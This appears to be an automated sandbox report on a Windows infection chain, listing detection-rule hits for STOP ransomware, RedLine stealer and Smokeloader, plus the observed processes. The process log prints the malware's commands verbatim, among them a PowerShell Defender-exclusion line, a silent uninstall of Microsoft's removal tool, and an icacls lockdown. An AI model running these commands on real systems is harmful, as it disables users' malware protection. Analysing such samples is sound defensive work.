Source: 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000017.00000002.2181370221.0000000002F57000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1719529460.0000000002FD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1986922413.0000000002F63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1719428841.0000000002CD3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.2077754464.0000000002F31000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1718695022.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: A5B6.exe PID: 7088, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 7148, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 2496, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 5888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 5516, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 4592, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 7140, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A5B6.exe PID: 2472, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C12E.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9914043476055194
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 0.9906636965209985
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 1.0014210050381087
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 1.0416666666666667
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 1.5
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 1.0304709141274238
Source: filename.exe.20.dr Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: filename.exe.20.dr Static PE information: Section: .reloc ZLIB complexity 1.5
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 0.9906636965209985
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 1.0014210050381087
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 1.0416666666666667
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 1.5
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 1.0304709141274238
Source: updater.exe.45.dr Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: updater.exe.45.dr Static PE information: Section: .reloc ZLIB complexity 1.5
Source: classification engine Classification label: mal100.rans.troj.adwa.spyw.evad.winEXE@75/325@14/12
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 10_2_00411900
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CD61B0 CreateToolhelp32Snapshot,Module32First, 0_2_02CD61B0
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 10_2_0040D240
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uthsueb Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8079.tmp Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\8079.bat" "
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --ForNetRes 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Task 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --AutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Service 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: X1P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: runas 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: x2Q 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: x*P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: C:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: D:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: 7P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: %username% 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: F:\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --ForNetRes 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Task 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --AutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Service 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: X1P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: runas 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: x2Q 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: x*P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: C:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: D:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: 7P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: %username% 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Command line argument: F:\ 10_2_00419F90
Source: MdeeRbWvqe.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: D3CC.exe, 00000015.00000003.2190101843.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MdeeRbWvqe.exe ReversingLabs: Detection: 18%
Source: A5B6.exe String found in binary or memory: set-addPolicy
Source: A5B6.exe String found in binary or memory: id-cmc-addExtensions
Source: A5B6.exe String found in binary or memory: set-addPolicy
Source: A5B6.exe String found in binary or memory: id-cmc-addExtensions
Source: A5B6.exe String found in binary or memory: set-addPolicy
Source: A5B6.exe String found in binary or memory: id-cmc-addExtensions
Source: A5B6.exe String found in binary or memory: set-addPolicy
Source: A5B6.exe String found in binary or memory: id-cmc-addExtensions
Source: unknown Process created: C:\Users\user\Desktop\MdeeRbWvqe.exe "C:\Users\user\Desktop\MdeeRbWvqe.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\uthsueb C:\Users\user\AppData\Roaming\uthsueb
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\8079.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe C:\Users\user\AppData\Local\Temp\A5B6.exe
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe C:\Users\user\AppData\Local\Temp\A5B6.exe
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe "C:\Users\user\AppData\Local\Temp\A5B6.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe --Task
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe "C:\Users\user\AppData\Local\Temp\A5B6.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe --Task
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exe
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D3CC.exe C:\Users\user\AppData\Local\Temp\D3CC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\E978.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2580 -ip 2580
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8792
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\filename.exe" -Verb runAs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\8079.bat" " Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe C:\Users\user\AppData\Local\Temp\A5B6.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D3CC.exe C:\Users\user\AppData\Local\Temp\D3CC.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\E978.bat" " Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
